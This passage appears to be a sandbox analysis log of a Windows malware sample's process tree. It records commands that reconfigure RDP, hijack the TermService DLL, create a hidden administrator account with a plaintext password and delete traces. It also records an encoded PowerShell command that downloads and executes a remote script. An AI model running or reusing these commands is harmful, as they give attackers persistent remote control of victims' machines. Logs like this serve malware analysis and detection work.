C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵PID:2632
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵PID:2892
-
-
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" -Version 5.1 -s -NoLogo -NoProfile3⤵PID:3892
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" ADD "HKLM\System\CurrentControlSet\Control\Terminal Server\WinStations\RDP-Tcp" /v PortNumber /t REG_DWORD /d 0x1C21 /f3⤵PID:3144
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add HKLM\system\currentcontrolset\services\TermService\parameters /v ServiceDLL /t REG_EXPAND_SZ /d C:\Windows\branding\mediasrv.png /f3⤵
- Modifies registry key
PID:3376
-
-
C:\Windows\SysWOW64\reg.exe"C:\Windows\system32\reg.exe" add "HKLM\SOFTWARE\Policies\Microsoft\Windows NT\Terminal Services" /v fEnableWddmDriver /t reg_dword /d 0 /f3⤵PID:4028
-
-
C:\Windows\SysWOW64\net.exe"C:\Windows\system32\net.exe" localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add3⤵PID:2020
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 localgroup Administrators "NT AUTHORITY\NETWORK SERVICE" /add4⤵PID:1724
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start rdpdr3⤵PID:2924
-
C:\Windows\SysWOW64\cmd.execmd /c net start rdpdr4⤵PID:3140
-
C:\Windows\SysWOW64\net.exenet start rdpdr5⤵PID:1632
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start rdpdr6⤵PID:1604
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c cmd /c net start TermService3⤵PID:704
-
C:\Windows\SysWOW64\cmd.execmd /c net start TermService4⤵PID:3184
-
C:\Windows\SysWOW64\net.exenet start TermService5⤵PID:3944
-
C:\Windows\SysWOW64\net1.exeC:\Windows\system32\net1 start TermService6⤵PID:3548
-
-
-
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.ps1 /f3⤵PID:2120
-
-
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" /c del %temp%\*.txt /f3⤵PID:1996
-
-
-
C:\Windows\SysWOW64\WerFault.exeC:\Windows\SysWOW64\WerFault.exe -u -p 3528 -s 7402⤵
- Program crash
PID:2972
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc 000000 /del1⤵
- Suspicious use of WriteProcessMemory
PID:2996 -
C:\Windows\system32\net.exenet.exe user WgaUtilAcc 000000 /del2⤵
- Suspicious use of WriteProcessMemory
PID:3720 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc 000000 /del3⤵PID:1632
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc dhyEpU36 /add1⤵
- Suspicious use of WriteProcessMemory
PID:4064 -
C:\Windows\system32\net.exenet.exe user WgaUtilAcc dhyEpU36 /add2⤵
- Suspicious use of WriteProcessMemory
PID:1232 -
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc dhyEpU36 /add3⤵PID:3672
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD1⤵
- Suspicious use of WriteProcessMemory
PID:2972 -
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD2⤵PID:3724
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" WgaUtilAcc /ADD3⤵PID:3964
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Remote Desktop Users" JQKTJDNJ$ /ADD1⤵PID:1112
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Remote Desktop Users" JQKTJDNJ$ /ADD2⤵PID:1364
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Remote Desktop Users" JQKTJDNJ$ /ADD3⤵PID:2716
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD1⤵PID:2684
-
C:\Windows\system32\net.exenet.exe LOCALGROUP "Administrators" WgaUtilAcc /ADD2⤵PID:932
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 LOCALGROUP "Administrators" WgaUtilAcc /ADD3⤵PID:3756
-
-
-
C:\Windows\System32\cmd.execmd /C net.exe user WgaUtilAcc dhyEpU361⤵PID:2636
-
C:\Windows\system32\net.exenet.exe user WgaUtilAcc dhyEpU362⤵PID:1164
-
C:\Windows\system32\net1.exeC:\Windows\system32\net1 user WgaUtilAcc dhyEpU363⤵PID:3744
-
-
-
C:\Windows\System32\cmd.execmd.exe /C wmic path win32_VideoController get name1⤵PID:1792
-
C:\Windows\System32\Wbem\WMIC.exewmic path win32_VideoController get name2⤵PID:4000
-
-
C:\Windows\System32\cmd.execmd.exe /C wmic CPU get NAME1⤵PID:1248
-
C:\Windows\System32\Wbem\WMIC.exewmic CPU get NAME2⤵
- Modifies data under HKEY_USERS
PID:1900
-
-
C:\Windows\System32\cmd.execmd.exe /C cmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA1⤵PID:3136
-
C:\Windows\system32\cmd.execmd /C powershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA2⤵PID:2940
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -ep bypass -NoProfile -outputformat text -nologo -noninteractive -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAIABOAGUAdAAuAFcAZQBiAGMAbABpAGUAbgB0ACkALgBkAG8AdwBuAGwAbwBhAGQAcwB0AHIAaQBuAGcAKAAiAGgAdAB0AHAAcwA6AC8ALwByAGEAdwAuAGcAaQB0AGgAdQBiAHUAcwBlAHIAYwBvAG4AdABlAG4AdAAuAGMAbwBtAC8AcwBxAGwAaQB0AGUAeQAvAHMAcQBsAGkAdABlAC8AbQBhAHMAdABlAHIALwBzAHAAZQBlAGQALgBwAHMAMQAiACkA3⤵
- Blocklisted process makes network request
- Drops file in Program Files directory
- Drops file in Windows directory
- Modifies data under HKEY_USERS
PID:1584
-
-